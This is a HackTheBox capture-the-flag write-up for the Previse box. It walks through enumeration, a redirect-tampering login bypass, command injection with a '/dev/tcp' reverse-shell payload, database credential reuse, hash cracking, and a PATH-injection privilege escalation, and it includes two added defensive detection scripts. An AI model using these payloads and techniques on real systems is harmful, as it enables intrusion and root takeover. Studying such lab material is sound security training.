Previse Writeup - HackTheBox


The Previse box from HackTheBox is a fun, interesting box, close to the real world. For some reason I really liked this box!

Pedro Mariano

Welcome to the writeup of the Previse box from HackTheBox. It was a fun, interesting box and close to the real world; it rewards curiosity to solve and get inside.

Without further ado, let's get down to business!


NMAP

nmap -v -sSV -p 22,80 -Pn 10.10.11.104 -T4 -oA nmap/sSV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Added 10.10.11.104 -> previse.htb to /etc/hosts.


Performed a directory brute-force with the Gobuster tool.

GOBUSTER

gobuster dir -u previse.htb -w /opt/directory-list-lowercase-2.3-medium.txt -e -s "200,301,302,401" -x "php" -t 100
http://previse.htb/login.php (Status: 200) [Size: 2224]
http://previse.htb/header.php (Status: 200) [Size: 980]
http://previse.htb/nav.php (Status: 200) [Size: 1248]
http://previse.htb/download.php (Status: 302) [Size: 0] [--> login.php]
http://previse.htb/index.php (Status: 302) [Size: 2801] [--> login.php]
http://previse.htb/footer.php (Status: 200) [Size: 217]
http://previse.htb/files.php (Status: 302) [Size: 4914] [--> login.php]
http://previse.htb/css (Status: 301) [Size: 308] [--> http://previse.htb/css/]
http://previse.htb/status.php (Status: 302) [Size: 2968] [--> login.php]
http://previse.htb/js (Status: 301) [Size: 307] [--> http://previse.htb/js/]
http://previse.htb/logout.php (Status: 302) [Size: 0] [--> login.php]
http://previse.htb/accounts.php (Status: 302) [Size: 3994] [--> login.php]
http://previse.htb/config.php (Status: 200) [Size: 0]
http://previse.htb/logs.php (Status: 302) [Size: 0] [--> login.php]
http://previse.htb/server-status (Status: 403) [Size: 276]

I could find other pages in the /nav.php source code that were not initially listed by Gobuster.

/file_logs.php

Even knowing these pages exist, we need to be authenticated to access them.

Used Burp to intercept the response and tamper with it, changing the status code from 301 to 200 "OK", then forwarded the response. Doing that I could bypass the login, access the pages and create an account.
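The condition that makes this bypass work is visible in the Gobuster output above: several pages redirect to login.php yet still return a body of several kilobytes, meaning the protected page was rendered and sent along with the redirect (the classic PHP header('Location: ...') with no exit after it). The script below is an added example, not code from the original writeup; it parses Gobuster output and flags such responses so a defender can spot them without a proxy. The sample lines are copied from the Gobuster results above.

```python
import re

# Sample input: lines copied from the Gobuster output in this writeup.
GOBUSTER_OUTPUT = """\
http://previse.htb/login.php (Status: 200) [Size: 2224]
http://previse.htb/download.php (Status: 302) [Size: 0] [--> login.php]
http://previse.htb/index.php (Status: 302) [Size: 2801] [--> login.php]
http://previse.htb/files.php (Status: 302) [Size: 4914] [--> login.php]
http://previse.htb/status.php (Status: 302) [Size: 2968] [--> login.php]
http://previse.htb/logout.php (Status: 302) [Size: 0] [--> login.php]
http://previse.htb/accounts.php (Status: 302) [Size: 3994] [--> login.php]
http://previse.htb/config.php (Status: 200) [Size: 0]
http://previse.htb/logs.php (Status: 302) [Size: 0] [--> login.php]
"""

# One Gobuster "dir" result line; the redirect target part is optional.
LINE_RE = re.compile(
    r"^(?P<url>\S+)\s+\(Status:\s*(?P<status>\d{3})\)\s+\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s+\[-->\s*(?P<target>\S+)\])?$"
)


def parse_gobuster(text):
    """Return a list of dicts (url, status, size, target) for each result line."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["status"] = int(d["status"])
            d["size"] = int(d["size"])
            results.append(d)
    return results


def leaky_redirects(results, min_body=0):
    """URLs that answer with a 3xx redirect but still carry a body.

    A login redirect whose body is larger than a few bytes is the symptom of
    a redirect issued without stopping script execution: the protected page
    was rendered and sent anyway, so rewriting the status to 200 in a proxy
    shows it to an unauthenticated user. min_body lets you ignore the small
    "Redirecting..." stub some frameworks emit legitimately.
    """
    return sorted(r["url"] for r in results
                  if 300 <= r["status"] < 400 and r["size"] > min_body)


if __name__ == "__main__":
    for url in leaky_redirects(parse_gobuster(GOBUSTER_OUTPUT)):
        print("redirect with body:", url)
```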


According to the permissions and information on the page, the new account ("NAP00") is apparently an "administrator" account.


With this access I was able to map the site internally and reach the previously identified pages that were not initially allowed, which made it possible to identify potential users.


User identified in the log data: m4lwhere.

At Files > Uploaded files it was possible to download siteBackup.zip and get the source code of the pages listed before.


The config.php page has the user and password for the MySQL service connection.

$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';

But this information did not give me a shell yet :(

Returning to the review of the page source code in search of possible flaws, the exec() function was found, and it was possible to abuse it for code execution.


Used Burp to intercept the request from the logs.php page and test the code execution.


Well, that worked!

Replayed the request calling the binary /bin/bash to get a reverse shell on port 6666, and awaited the connection with netcat.

delim=comma%26/bin/bash+-c+'bash+-i+>+/dev/tcp/10.10.14.176/6666+0>%261'
nc -vnlp 6666

Finally, we are inside! But our permissions are limited...

As identified before, the application connects to the database using the MySQL credentials found in config.php. Using these credentials it was possible to access the database successfully, and m4lwhere's password hash was found.

+----+--------------+------------------------------------+---------------------+
| id | username | password | created_at |
+----+--------------+------------------------------------+---------------------+
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb▋▋▋▋▋▋▋▋▋ | 2021-05-27 18:18:36 |

Used hashcat to crack the hash with the rockyou.txt wordlist.

hashcat -a 0 -m 500 user /usr/share/wordlists/rockyou.txt

Used ssh to connect as the m4lwhere user.

ssh m4lwhere@10.10.11.104

Logged in as m4lwhere, it was possible to get the user flag.


Privilege Escalation

Now we need to escalate our privileges. To do that we can use the command sudo -l, which shows sudo permission for the /opt/scripts/access_backup.sh script.

m4lwhere@previse:~$ sudo -l
[sudo] password for m4lwhere:
User m4lwhere may run the following commands on previse:
(root) /opt/scripts/access_backup.sh

Analyzing the /opt/scripts/access_backup.sh script, you can see that some commands/binaries are called by bare name rather than by absolute path, which opens the door to a "PATH injection" vulnerability.

In a writable directory (/dev/shm) I set the $PATH environment variable to my current directory and created a "date" file containing a netcat command to return a reverse shell on port 6699.

After that, executing the script with sudo runs my "new" date file as root, and hence the netcat command.
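The defender-side check for this class of bug, as an added example (this is neither the box's script nor code from the writeup; the sample script is a constructed stand-in): it lists every command a shell script invokes by bare name, which is exactly what $PATH resolves, and shows a hardened version that resets PATH and uses absolute paths.

```python
import re
import shlex

# Constructed stand-in for a backup script that calls binaries by bare name.
# It is NOT the real /opt/scripts/access_backup.sh from the box.
SAMPLE_SCRIPT = """\
#!/bin/bash
# Archive the previous day of access logs (constructed example)
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
chown root:root /var/backups/*.gz
"""

# Hardened form: PATH is pinned and every binary is referenced absolutely.
# At the system level, sudo's secure_path option gives the same protection.
HARDENED_SCRIPT = """\
#!/bin/bash
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
/bin/gzip -c /var/log/apache2/access.log > /var/backups/$(/bin/date --date="yesterday" +%Y%b%d)_access.gz
/bin/chown root:root /var/backups/*.gz
"""

BUILTINS = {"cd", "echo", "exit", "export", "set", "unset", "if", "then",
            "else", "fi", "for", "do", "done", "while", "return", "test", "["}


def bare_commands(script):
    """Return the set of command names invoked without an absolute path.

    Each statement, including the inside of $(...) substitutions, is split on
    the shell separators and the first word of every piece is checked. A bare
    name is resolved through $PATH, which a sudo caller controls unless the
    script resets PATH or sudo's secure_path is in effect. Comment stripping
    is naive (a '#' inside quotes is treated as a comment).
    """
    found = set()
    for line in script.splitlines():
        line = "" if line.startswith("#!") else line.split("#", 1)[0]
        subs = re.findall(r"\$\(([^()]*)\)", line)          # $(...) bodies
        outer = re.sub(r"\$\([^()]*\)", "SUB", line)         # rest of the line
        for stmt in subs + [outer]:
            for piece in re.split(r"\|\||&&|[;|]", stmt):
                try:
                    words = shlex.split(piece)
                except ValueError:
                    words = piece.split()
                if not words:
                    continue
                cmd = words[0]
                if "=" in cmd or cmd in BUILTINS or cmd.startswith("/"):
                    continue
                found.add(cmd)
    return found


def resets_path(script):
    """True if the script assigns PATH itself (e.g. PATH=/usr/bin:/bin)."""
    return any(re.match(r"\s*(export\s+)?PATH=", ln) for ln in script.splitlines())
```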


Received the reverse shell connection as root successfully!

Upgraded the reverse shell with python and got the root flag o/


Conclusion

Despite being classified as easy, it wasn't that "easy". The second flag (root flag) is not complex, and yet it stayed close to the real world, because many are concerned about external security but don't "believe" in internal access (don't be like that!). But to get the first flag (user flag), as you could see, it was a FUN job XD

For some reason I really liked this box! And I send my special thanks to "m4lwhere", the creator of this box.


Thanks for reading and feel free to pingback a coffee ;D
